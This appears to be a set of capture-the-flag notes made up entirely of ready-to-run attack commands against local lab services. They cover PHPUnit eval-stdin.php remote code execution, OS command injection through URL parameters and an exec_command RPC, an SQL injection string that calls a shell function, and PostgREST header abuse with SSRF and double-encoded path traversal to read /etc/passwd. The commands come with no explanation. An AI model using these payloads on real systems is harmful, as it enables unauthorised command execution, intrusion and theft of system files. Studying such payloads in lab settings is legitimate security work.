curl -v http://127.0.0.1/log-api/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -d '?><?php system("cat /usr/share/flag-ne/flag.txt");'
curl -v http://127.0.0.1/api/rpc/exec_command?cmd=cat%20/usr/lib/include/flag_ne/flag.txt
http://127.0.0.1/mathsays.html?t=%24(cat%20%2Fflag%2Fflag.txt)

Free-Chat
' || (select public."exec_command"('ls /')) || '

Postgrest
curl -v http://127.0.0.1/api/ -H 'Accept-Profile: a'

curl -v http://127.0.0.1/api/ -H 'Accept-Profile: extensions' | jq

curl -v 'http://127.0.0.1/api/rpc/http_get?uri=http://1.1.1.1' -H 'Accept-Profile: extensions'

curl -v 'http://127.0.0.1/api/rpc/http_get?uri=http://php/cgi-bin/.%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd' -H 'Accept-Profile: extensions' 